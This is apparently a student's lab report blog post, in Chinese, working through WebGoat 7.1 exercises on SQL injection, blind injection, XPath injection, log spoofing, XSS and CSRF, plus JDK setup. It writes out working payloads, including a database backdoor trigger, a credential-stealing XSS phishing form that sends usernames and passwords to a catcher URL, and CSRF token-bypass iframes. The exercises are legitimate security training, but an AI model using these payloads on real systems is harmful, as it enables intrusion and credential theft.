Live2D

20154327 Exp9 Web安全基础

基础问题回答

(1)SQL注入攻击原理,如何防御

  • 原理:
    程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,攻击者利用SQL命令欺骗服务器执行恶意的SQL命令,获得某些他想得知的数据。
  • 防御:
    就像我们上次做实验对网页登陆的账户做了密码长度的限制,可以限制输入的长度、检查输入变量的数据类型,限制特殊字符的输入,把用户输入的or, –,';等关键字和特殊字符都过滤了,大不了抛出异常而已呗…… 或者用语言内建的安全机制(比如说 JDBC 的PreparedStatement就可以很大程度的防止 SQL 注入)

(2)XSS攻击的原理,如何防御

  • 原理:
    XSS攻击全称跨站脚本攻击,也由于没有对用户输入数据的合法性进行判断,攻击者在网页上插入恶意代码,攻击用户。
  • 防御:
    与防御SQL注入一样,可以通过检查用户的输入字符串,并做出限制。

(3)CSRF攻击原理,如何防御

  • 原理:
    跨站请求伪造,攻击者通过伪造身份等方式来达到一些非法目的,以你的名义来发送恶意请求。
  • 防御:
    使用验证码,表单中附加随机值,以此来防止冒充。

环境配置

  • 去官网提供的GitHub上下载,那个速度是真的捉急,这里感谢下齐帅提供的
    WebGoat8.0

  • 我后面自己下的WebGoat7.1密码: 4327

  • 顺便附上自己在网上找到的
    WebGoat中文手册以及WebGoat用户指南

  • 下载好后,使用命令:java -jar webgoat-server-8.0.0.M14.jar运行WebGoat

  • 然后在浏览器中打开http://localhost:8080/WebGoat进入登录界面:

  • 这里我的一开始一直显示 Firefox can’t establish a connection to the server at localhost:8080.

  • 一开始以为是8080端口被占用了,利用netstat -tupln |grep 8080发现没有被占用,然后去从新看了下安装教程,怀疑是JDK的问题.

  • 这里贴上一个自己安装JDK的教程,安装完后成功打开。

  • 首先,去官方网站下载JDK1.8对应的版本
    JDK

  • 将下载好的JDK包提取出来,解压出来文件夹名为 jdk1.8.0_172
    开始拷贝目录 手动安装 (注意文件夹名根据自己的实际情况来设定)

 sudo mkdir -p /usr/local/java
cp -r jdk1.8.0_172/ /usr/local/java/
  • 如图
  • 接下来配置JDK的环境变量
sudo gedit /etc/profile
  • 复制以下内容追加到文件末尾(注意文件夹名根据自己的实际情况来设定)
JAVA_HOME=/usr/local/java/jdk1.8.0_172
PATH=$PATH:$HOME/bin:$JAVA_HOME/bin
export JAVA_HOME
export PATH
  • 如图:

  • 告诉系统JDK的位置,最后2行代码不是重复,是要执行2次 。 (注意文件夹名根据自己的实际情况来设定)

sudo update-alternatives --install "/usr/bin/java" "java" "/usr/local/java/jdk1.8.0_172/bin/java" 1
sudo update-alternatives --install "/usr/bin/javac" "javac" "/usr/local/java/jdk1.8.0_172/bin/javac" 1
sudo update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/local/java/jdk1.8.0_172/bin/javaws" 1
sudo update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/local/java/jdk1.8.0_172/bin/javaws" 1
  • 如图:

  • 设置新的JDK为默认,代码也是执行2次(注意文件夹名根据自己的实际情况来设定)

sudo update-alternatives --set java /usr/local/java/jdk1.8.0_172/bin/java
sudo update-alternatives --set java /usr/local/java/jdk1.8.0_172/bin/java
sudo update-alternatives --set javac /usr/local/java/jdk1.8.0_172/bin/javac
sudo update-alternatives --set javac /usr/local/java/jdk1.8.0_172/bin/javac
sudo update-alternatives --set javaws /usr/local/java/jdk1.8.0_172/bin/javaws
sudo update-alternatives --set javaws /usr/local/java/jdk1.8.0_172/bin/javaws
  • 如图:

  • 重载Profile文件

source /etc/profile
  • 输入命令查看Java版本号
java -version
  • 好了,至此,安装成功 !

  • 尝试访问WebGoat,成功!

  • 8.0的这里可以自己申请个账号,7.1的话有默认账号,用默认的就行。

  • 成功登陆:

  • 等开始做才做才发现,这是个大坑,由于WebGoat不同的版本课程都不一样,我在官网上下的是最新的8.0.0,网上找到的教程都是低版本的,高版本和低版本的操作完全不一样,只能参考着低版本再开着翻译做,但做完SQL之后WebGoat8便打不开了,可能是因为两个不共存的原因。

  • 这里我用7.1重新做了一遍

Injection Flaws

Numeric SQL Injection

  • 原理大概就是这里有一个SQL语句
SELECT * FROM weather_data WHERE station = [station]
  • 可以拦截报文将station字段后补充成一个永真式101 OR 1=1。

  • 但这里没有文本框让我们直接进行输入操作,只有一个滑动文本框让我们选择,这里提供一个简单的方法,不需要通过burp-suite,kali上自带的火狐开发人员工具调试,按F12或者右键审查元素打开。

  • 于是整个语句就变成了

SELECT * FROM weather_data WHERE station = 101 OR 1=1
  • 由于1=1恒成立,点击go,看到所有城市的天气,成功。

Log Spoofing

日志伪造,目的是通过注入恶意字符串,按照规则伪造出一条日志,在Username输入

zh%0d%0aLogin Succeeded for username: admin
  • 其中%0d和%0a为CRLF换行符,看到的输出为

  • 第二行就是我们刚刚伪造出来的

XPATH Injection

  • 题干的意思大概是你的账号是Mike/test123。你的目标是尝试查看其他员工的数据。
  • 和上面一样,尝试构造永真式
yzh' or 1=1 or 'a'='a
  • 成功:

String SQL Injection

  • 字符注入,这里和前面数字注入的方法差不多,构造一个永真式,还是用的之前的'or 1='1
yzh' OR '1'='1
SELECT * FROM user_data WHERE last_name = 'yzh' OR '1'='1'
  • 成功:

LAB: SQL Injection

阶段1:String SQL Injection

  • 使用字符串SQL注入绕过认证,让我们可以登陆Boss(“Neville”)的账号。
  • 类似之前利用永真式想办法绕过验证,修改password=' or'1'='1,结果登陆失败,审查元素将最大长度maxlength改为50继续,成功~

阶段2:Parameterized Query #1

  • 这里需要WEBGOAT的开发者版本,先跳过了。

阶段3:Numeric SQL Injection

  • 绕过认证执行SQL注入,使登录Larry账户,但是能查看Boss的信息。
  • 还是和之前的想法一样,我们只需将employee_id参数修改为:101 or 1=1 order by salary desc

Database Backdoors

  • 利用SQL输入插入后门,首先是一个SQL注入点,可以通过数字注入看到所有人的薪水,然后使用以下SQL指令可以修改薪水

  • 在User ID输入框输入:101;update employee set salary = 65000 where userid=101; ,点击提交,如下图所示:

  • 使用SQL注入注入一个后门,下边这个后门好象是创建新用户的时候会自动修改邮箱为你的邮箱

101; CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='john@hackme.com'WHERE userid = NEW.userid.
  • 点击提交,如下图所示:

Blind Numeric SQL Injection

  • 数字盲注,有些时候存在SQL注入,但是获取不到我们需要的信息,此时可以通过SQL语句的条件判断,进行盲注。
  • 使用盲注进行爆破,在“Enter your Account Number”输入
101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') > 10000 );
  • 根据返回的提示来判断
“(SELECT pin FROM pins WHERE cc_number='1111222233334444') > 10000"
  • 为真或为假,逐步缩小范围,最后尝试用2364进行请求,返回成功,然后把2364输入表单,提交,如下图所示:

Blind String SQL Injection

  • 使用盲注进行爆破,在“Enter your Account Number”输入
101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 1, 1) = 'h' );
  • 根据返回的提示来判断name的范围,直至返回成功,然后把Jill输入表单,提交,如下图所示:

Cross-Site Scripting (XSS)

Phishing with XSS

  • 使用XSS和HTML插入制作一个钓鱼网站,代码如下:
</form>
  <script>
function hack(){ 
XSSImage=new Image;
XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
} 
  </script>
<form name="phish">
<br><br>
<HR>
  <H2>This feature requires account login:</H2>
<br>
  <br>Enter Username:<br>
  <input type="text" name="user">
  <br>Enter Password:<br>
  <input type="password" name = "pass">
<br>
  <input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>
  • 成功:

LAB:Cross Site Scripting

  • 这里通过6个阶段系统的介绍了XSS。

  • Stage1-4这四个步骤Stage5-6主要是介绍了储存型XSS,而Stage5-6介绍了反射型的XSS,步骤如下:

阶段1:

  • 使用Tom登录,编辑用户信息,在Street字段输入以下代码:
<script>alert("20154327");</script>
  • 成功:

  • 阶段2、4、6需要开发者版本先调过了。

阶段3:执行一个先前的存储XSS攻击

  • 使用“David”登录,然后查看“Bruce”的信息,即可完成。

阶段5:执行一个反射XSS攻击

  • 在搜索员工页面使用脆弱性手工制造一个包含反射XSS攻击的URL。验证使用此链接的另一个用户被此攻击影响。
  • 以“Larry”登录,在“Search Staff”搜索框输入“”。

Stored XSS Attacks

  • 最典型的储存型XSS的例子——留言板
  • 因为可以输入任何信息,如果有人进行了恶意留言,那么之后的人便会中招。
  • 具体操作:
  • 在Title里输入“Test Stored XSS”,在 Message里输入
<script>alert("20154327yangzhenghui!");</script>
  • 如下图所示:

Reflected XSS Attacks

  • 当未验证的用户输入用在HTTP响应时会发生XSS。在一个反射XSS攻击中,攻击者可以使用攻击脚本制造一个URL,然后提交到另一个网站、发邮件或让受害者点击。

CSRF

Cross Site Request Forgery(CSRF)

  • 实验目标:向新闻组发送一封email。这个email包含一个image,其URL指向一个恶意请求。

  • 这里是一个储存型XSS和跨站请求伪造结合的示例,CSRF就是冒名登录,用代码伪造请求

  • 在Title输入:20154327,在Message输入:

<img src="http://localhost:8080/WebGoat/attack?Screen=280&menu=900&transferFunds=5000" width="1" height="1" />
  • 点击“Submit”,在Message List下出现一条提交的记录,如下图所示:

CSRF Prompt By-Pass

  • 在Title输入:20154327;在Message输入:
<iframe
    src="attack?Screen=280&menu=900&transferFunds=5000"
    id="myFrame" frameborder="1" marginwidth="0"
    marginheight="0" width="800" scrolling=yes height="300"
    onload="document.getElementById('frame2').src='attack?Screen=280&menu=900&transferFunds=CONFIRM';">
</iframe>
 <iframe
    id="frame2" frameborder="1" marginwidth="0"
    marginheight="0" width="800" scrolling=yes height="300">
</iframe>
  • 如下图所示:

CSRF Token By-Pass

  • 在Title输入:20154327
  • 在Message输入构造的代码:
<script>
	var tokensuffix;
	 
	function readFrame1()
	{
		var frameDoc = document.getElementById("frame1").contentDocument;
		var form = frameDoc.getElementsByTagName("form")[0];
		tokensuffix = '&CSRFToken=' + form.CSRFToken.value;
	 
		loadFrame2();
	}
	 
	function loadFrame2()
	{
		var testFrame = document.getElementById("frame2");
		testFrame.src="attack?Screen=273&menu=900&transferFunds=5000" + tokensuffix;
	}
</script>
 
<iframe src="attack?Screen=273&menu=900&transferFunds=main"
    onload="readFrame1();"
    id="frame1" frameborder="1" marginwidth="0"
    marginheight="0" width="800" scrolling=yes height="300"></iframe>
 
<iframe id="frame2" frameborder="1" marginwidth="0"
    marginheight="0" width="800" scrolling=yes height="300"></iframe>
  • 点击Submit,然后在Message List里点击“CSRF Token By-Pass Attack”,如下图所示:

实验总结与体会

  • 提交实验的时候发现,博客园居然也没有设防,下面是我上面钓鱼网站用的,直接就在下面显示出来了,有点恐怖啊兄弟。。。

  • 这次实验一开始下载是最新版的WebGoat8,做完第一部分SQL注入实验后,想尝试下WebGoat7.1的SQL注入加深自己的印象,于是去网上下载了WebGoat7.1进行实验,但返回来继续用8往下做的时候,WebGoat8便提示:There was an unexpected error. Please try again。便只能用7.1一路做下去,将7.1上关于SQL注入攻击、XSS攻击、CSRF攻击部分能做的全部做了一遍,加深自己的理解。






Enter Username:

Enter Password:




posted @ 2018-05-20 19:43  lovezh  阅读(542)  评论(0编辑  收藏